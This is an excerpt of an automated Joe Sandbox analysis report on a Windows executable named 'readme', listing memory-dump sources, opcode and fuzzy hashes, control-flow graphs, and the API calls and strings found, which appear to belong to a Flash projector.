                                                                                                                                                                                                          • Associated: 00000013.00000002.1648929772.00000000006F9000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1649027493.0000000000700000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1649055213.0000000000703000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1649089510.0000000000709000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1649214680.000000000070E000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1649309849.000000000073C000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1649361299.000000000073F000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_19_2_400000_readme.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: 927d87f6a08cd34fb77d99441a45c3a4ce47cf1e0f25776f7bb3331dde36990d
                                                                                                                                                                                                          • Instruction ID: 1e7c3244e7452ae8d69b03c5c8d6f6dafe267a2916603bd4dd3bb4cac85038a4
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 927d87f6a08cd34fb77d99441a45c3a4ce47cf1e0f25776f7bb3331dde36990d
                                                                                                                                                                                                          • Instruction Fuzzy Hash: FCC15171A087A28FC304CF5884C0406FFE2BED535072DC7AAD8985B3A6D378A899D7D5
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000013.00000002.1647845801.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000013.00000002.1647792820.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648148817.000000000053D000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648206720.0000000000555000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648206720.0000000000562000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648296468.0000000000628000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648616432.0000000000674000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648825942.00000000006E7000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648854998.00000000006EA000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648894935.00000000006F5000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648929772.00000000006F9000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1649027493.0000000000700000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1649055213.0000000000703000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1649089510.0000000000709000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1649214680.000000000070E000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1649309849.000000000073C000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1649361299.000000000073F000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_19_2_400000_readme.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: 328fd253c3d3266b9f1183c168a7c073fa13225f90af89d8ccac7b3aac2585fb
                                                                                                                                                                                                          • Instruction ID: bfa59705cebf717bb77a31e3df0fdea1df1b133d84f49527330e693498930ead
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 328fd253c3d3266b9f1183c168a7c073fa13225f90af89d8ccac7b3aac2585fb
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0091A4B2D001285FF728CA18DD56AEBBB79EB84314F0541BBE40DA6684D7785FC1CE42
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000013.00000002.1647845801.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000013.00000002.1647792820.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648148817.000000000053D000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648206720.0000000000555000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648206720.0000000000562000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648296468.0000000000628000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648616432.0000000000674000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648825942.00000000006E7000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648854998.00000000006EA000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648894935.00000000006F5000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648929772.00000000006F9000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1649027493.0000000000700000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1649055213.0000000000703000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1649089510.0000000000709000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1649214680.000000000070E000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1649309849.000000000073C000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1649361299.000000000073F000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_19_2_400000_readme.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: 6a5c0a1541d3030db029717021fe89afd2a5752fc6c068978f495cf4b702206e
                                                                                                                                                                                                          • Instruction ID: daade82ce8e1d1b2ee71ce6920598c29f2be78123f22ed51f0027d5a07208b60
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6a5c0a1541d3030db029717021fe89afd2a5752fc6c068978f495cf4b702206e
                                                                                                                                                                                                          • Instruction Fuzzy Hash: F471E8B2D001285FF768CA18DD56AEBBB78EB45314F0541FBE80DA6680D6385FC5CE52
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000013.00000002.1647845801.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000013.00000002.1647792820.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648148817.000000000053D000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648206720.0000000000555000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648206720.0000000000562000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648296468.0000000000628000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648616432.0000000000674000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648825942.00000000006E7000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648854998.00000000006EA000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648894935.00000000006F5000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648929772.00000000006F9000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1649027493.0000000000700000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1649055213.0000000000703000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1649089510.0000000000709000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1649214680.000000000070E000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1649309849.000000000073C000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1649361299.000000000073F000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_19_2_400000_readme.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: 68be6958af1c6a53e962f91bcc0efa0a9d1af6a4e755137e866c4c74eff88070
                                                                                                                                                                                                          • Instruction ID: 95a1ac05ea7bf9e85cb9af7e548825cad19751d86e8640f90a726477929908b6
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 68be6958af1c6a53e962f91bcc0efa0a9d1af6a4e755137e866c4c74eff88070
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6351B5B2D011285FF768CA18DE56AEBBB78EF94314F0541BBE40DA6680D6385FC4CD42
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000013.00000002.1647845801.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000013.00000002.1647792820.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648148817.000000000053D000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648206720.0000000000555000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648206720.0000000000562000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648296468.0000000000628000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648616432.0000000000674000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648825942.00000000006E7000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648854998.00000000006EA000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648894935.00000000006F5000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648929772.00000000006F9000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1649027493.0000000000700000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1649055213.0000000000703000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1649089510.0000000000709000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1649214680.000000000070E000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1649309849.000000000073C000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1649361299.000000000073F000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_19_2_400000_readme.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: 75b50ff1b9ba4dd892b9e41ada2c345e4812fadd8f996589414a3cb6cb0e819a
                                                                                                                                                                                                          • Instruction ID: 53d2608e8c54cd10bb4b85a771cf95748db63415cbca46aee886de67e8a57e6b
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 75b50ff1b9ba4dd892b9e41ada2c345e4812fadd8f996589414a3cb6cb0e819a
                                                                                                                                                                                                          • Instruction Fuzzy Hash: E0218EB1B054214FDB2C9B0E942113AB7E3EFDE30234A82BEE8579B3A9D9741D11D694

                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                          control_flow_graph 26 4f4a60-4f4a93 EnterCriticalSection 27 4f4a95-4f4a9d 26->27 28 4f4aa3-4f4aab 26->28 27->28 29 4f4aad-4f4ab5 28->29 30 4f4abb-4f4ac3 28->30 29->30 31 4f4ac5-4f4acd 30->31 32 4f4ad3-4f4adb 30->32 31->32 33 4f4aed-4f4af5 32->33 34 4f4add-4f4ae7 32->34 35 4f4afb-4f4b07 LeaveCriticalSection 33->35 36 4f4bf2-4f4bfe LeaveCriticalSection 33->36 34->33 37 4f4b09-4f4b19 35->37 38 4f4b21-4f4b27 35->38 39 4f4c18-4f4c1e 36->39 40 4f4c00-4f4c10 36->40 37->38 41 4f4b29-4f4b39 38->41 42 4f4b41-4f4b47 38->42 43 4f4c38-4f4c3e 39->43 44 4f4c20-4f4c30 39->44 40->39 41->42 45 4f4bbb-4f4bc1 42->45 46 4f4b49-4f4b69 42->46 47 4f4cb2-4f4cb8 43->47 48 4f4c40-4f4c60 43->48 44->43 51 4f4f2f-4f4f35 45->51 52 4f4bc7-4f4bf1 45->52 53 4f4b6b 46->53 54 4f4b71-4f4bb8 call 462e80 call 4a5380 call 439d00 46->54 55 4f4cdc-4f4d05 EnterCriticalSection LeaveCriticalSection 47->55 56 4f4cba-4f4cd4 47->56 49 4f4c68-4f4caf call 462e80 call 4a5380 call 439d00 48->49 50 4f4c62 48->50 49->47 50->49 53->54 54->45 59 4f4f2e 55->59 60 4f4d0b-4f4d1c EnterCriticalSection LeaveCriticalSection 55->60 56->55 59->51 64 4f4d24-4f4d42 EnterCriticalSection 60->64 65 4f4df8-4f4e1d EnterCriticalSection call 4f3bc0 LeaveCriticalSection 64->65 66 4f4d48-4f4d50 64->66 77 4f4e1f-4f4e2b 65->77 78 4f4e3b-4f4e46 call 4f3340 65->78 66->65 69 4f4d56-4f4d6e EnterCriticalSection LeaveCriticalSection 66->69 73 4f4d74-4f4df1 EnterCriticalSection LeaveCriticalSection EnterCriticalSection LeaveCriticalSection 69->73 74 4f4df3 69->74 73->65 73->74 74->65 81 4f4e2d 77->81 82 4f4e32-4f4e34 77->82 89 4f4e97-4f4e9c LeaveCriticalSection 78->89 90 4f4e48-4f4e4d 78->90 81->82 82->78 87 4f4e36-4f4e39 82->87 87->78 87->89 91 4f4ea2-4f4ebd EnterCriticalSection 89->91 92 4f4e4f-4f4e51 90->92 93 4f4e69-4f4e73 call 4f3d00 90->93 96 4f4ebf-4f4ec1 91->96 97 4f4ed8-4f4ee5 LeaveCriticalSection 91->97 92->93 94 4f4e53-4f4e55 92->94 101 4f4e78-4f4e8f LeaveCriticalSection 93->101 94->93 100 4f4e57-4f4e67 call 4ff020 call 439d00 94->100 102 4f4eca-4f4ed2 96->102 103 4f4ec3-4f4ec8 96->103 98 4f4f0c-4f4f12 97->98 99 4f4ee7-4f4efb EnterCriticalSection 97->99 98->59 107 4f4f14-4f4f29 98->107 104 4f4efd 99->104 105 4f4f01-4f4f06 LeaveCriticalSection 99->105 100->101 101->64 108 4f4e95 101->108 102->97 103->97 104->105 105->98 107->59 108->91
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32 ref: 004F4A89
                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(?), ref: 004F4AFB
                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(?), ref: 004F4BF2
                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?,00000000), ref: 004F4CEA
                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(?,?), ref: 004F4CFD
                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?), ref: 004F4D17
                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(?), ref: 004F4D1A
                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?), ref: 004F4D36
                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?), ref: 004F4D5D
                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(?), ref: 004F4D66
                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?), ref: 004F4D81
                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(?), ref: 004F4D87
                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?), ref: 004F4DB6
                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(?), ref: 004F4DC0
                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?), ref: 004F4E05
                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(?), ref: 004F4E11
                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(?,00000000), ref: 004F4E7D
                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(?), ref: 004F4E9C
                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?), ref: 004F4EB3
                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(?), ref: 004F4ED9
                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?), ref: 004F4EF4
                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(?), ref: 004F4F06
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000013.00000002.1647845801.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000013.00000002.1647792820.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648148817.000000000053D000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648206720.0000000000555000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648206720.0000000000562000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648296468.0000000000628000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648616432.0000000000674000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648825942.00000000006E7000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648854998.00000000006EA000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648894935.00000000006F5000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648929772.00000000006F9000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1649027493.0000000000700000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1649055213.0000000000703000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1649089510.0000000000709000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1649214680.000000000070E000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1649309849.000000000073C000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1649361299.000000000073F000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_19_2_400000_readme.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: CriticalSection$Leave$Enter
                                                                                                                                                                                                          • String ID: NetStream.Play.Start$NetStream.Play.Stop$NetStream.Play.StreamNotFound$NetStream.Seek.InvalidTime$NetStream.Seek.Notify$error$status
                                                                                                                                                                                                          • API String ID: 2978645861-761530088
                                                                                                                                                                                                          • Opcode ID: 8031fb2b16cf08ebb29042ea612b824201a734ec780002ffcc35b8889f179ffa
                                                                                                                                                                                                          • Instruction ID: 162dc2aece2cb8deeda7270d3cf99ca9d96a23cce06d37320eaaf024755f17c1
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8031fb2b16cf08ebb29042ea612b824201a734ec780002ffcc35b8889f179ffa
                                                                                                                                                                                                          • Instruction Fuzzy Hash: C7E190352047459FD320DB34C845BABBBE1BF89714F04895DE9AA57382CB74F80ACB65

                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                          control_flow_graph 590 4d5d20-4d5d40 call 435350 593 4d6069-4d6073 590->593 594 4d5d46-4d5d56 call 435400 590->594 597 4d5d58-4d5d6f DestroyWindow 594->597 598 4d5d72-4d5d82 call 435400 594->598 601 4d5dab-4d5dbb call 435400 598->601 602 4d5d84-4d5da8 call 4d5380 call 4db4e0 598->602 607 4d5dbd-4d5dec call 4d5380 call 4a7ac0 601->607 608 4d5def-4d5dff call 435400 601->608 616 4d5fdc-4d5fec call 435400 608->616 617 4d5e05-4d5e12 608->617 630 4d5fee-4d602f call 4d5380 GetMenu call 4dad30 616->630 631 4d6032-4d6042 call 435400 616->631 620 4d5e14-4d5e16 617->620 621 4d5e41-4d5e55 GetModuleFileNameA 617->621 625 4d5e1c-4d5e1e 620->625 626 4d5e18-4d5e1a 620->626 622 4d605c-4d6066 621->622 623 4d5e5b-4d5e5c 621->623 623->622 629 4d5e62-4d5e69 623->629 627 4d5e24-4d5e26 625->627 628 4d5e20-4d5e22 625->628 626->625 632 4d5e38-4d5e3f 626->632 634 4d5e2c-4d5e2e 627->634 635 4d5e28-4d5e2a 627->635 628->627 628->632 636 4d5e6b-4d5e6e 629->636 637 4d5e80-4d5e82 629->637 631->593 644 4d6044-4d6056 call 4d5380 631->644 632->620 632->621 634->632 640 4d5e30-4d5e32 634->640 635->632 635->634 636->637 641 4d5e70-4d5e71 636->641 637->622 643 4d5e88-4d5e92 637->643 640->622 640->632 641->629 645 4d5e73-4d5e7d 641->645 647 4d5e95-4d5e9a 643->647 644->622 647->647 650 4d5e9c-4d5ec2 call 52b380 * 2 647->650 656 4d5fbf-4d5fd9 call 439d00 * 2 650->656 657 4d5ec8-4d5eca 650->657 657->656 659 4d5ed0-4d5eda 657->659 661 4d5ee0-4d5ee8 659->661 661->661 663 4d5eea-4d5eed 661->663 665 4d5ef0-4d5ef6 663->665 665->665 666 4d5ef8-4d5f20 665->666 667 4d5f22-4d5f2a 666->667 667->667 668 4d5f2c-4d5f30 667->668 669 4d5f33-4d5f39 668->669 669->669 670 4d5f3b-4d5f4d 669->670 671 4d5f50-4d5f55 670->671 671->671 672 4d5f57-4d5f5d 671->672 673 4d5f60-4d5f66 672->673 673->673 674 4d5f68-4d5fb9 CreateProcessA 673->674 674->656
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • DestroyWindow.USER32(?,?,?,?,?), ref: 004D5D5F
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000013.00000002.1647845801.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000013.00000002.1647792820.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648148817.000000000053D000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648206720.0000000000555000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648206720.0000000000562000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648296468.0000000000628000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648616432.0000000000674000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648825942.00000000006E7000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648854998.00000000006EA000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648894935.00000000006F5000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648929772.00000000006F9000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1649027493.0000000000700000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1649055213.0000000000703000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1649089510.0000000000709000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1649214680.000000000070E000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1649309849.000000000073C000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1649361299.000000000073F000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_19_2_400000_readme.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: DestroyWindow
                                                                                                                                                                                                          • String ID: D$FSCommand:$\fscommand$allowscale$exec$fullscreen$quit$showmenu$trapallkeys
                                                                                                                                                                                                          • API String ID: 3375834691-1928458085
                                                                                                                                                                                                          • Opcode ID: 651f01098ba612e2aa20b3cdcfc404e6a88be88dae9858ed9b192afdef851395
                                                                                                                                                                                                          • Instruction ID: 7647b0b3e504c4bbb0374484e0d8b702cf2a7569de5a553b4a60fd35f403e9ef
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 651f01098ba612e2aa20b3cdcfc404e6a88be88dae9858ed9b192afdef851395
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 27914C35504B015BCB24EF28EC617FBB791AFA6309F44451FE8888B341DB2A990BC7D9

                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • GetWindowLongA.USER32(?,000000F0), ref: 004DB511
                                                                                                                                                                                                          • GetWindowRect.USER32(?,?), ref: 004DB531
                                                                                                                                                                                                          • GetClientRect.USER32(?,?), ref: 004DB541
                                                                                                                                                                                                          • SetWindowLongA.USER32(?,000000F0,?), ref: 004DB55D
                                                                                                                                                                                                          • GetMenu.USER32(?), ref: 004DB581
                                                                                                                                                                                                          • SetMenu.USER32(?,00000000), ref: 004DB596
                                                                                                                                                                                                          • GetDesktopWindow.USER32 ref: 004DB5B0
                                                                                                                                                                                                          • GetWindowRect.USER32(00000000,?), ref: 004DB5BC
                                                                                                                                                                                                          • SetWindowPos.USER32(?,00000000,?,?,?,?,00000000,?,?,?,?,?,?,004D5D9E,00000000), ref: 004DB5E1
                                                                                                                                                                                                          • GetWindowLongA.USER32(?,000000F0), ref: 004DB604
                                                                                                                                                                                                          • SetWindowLongA.USER32(?,000000F0,?), ref: 004DB62A
                                                                                                                                                                                                          • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?,?,?,?,?,004D5D9E,00000000), ref: 004DB66D
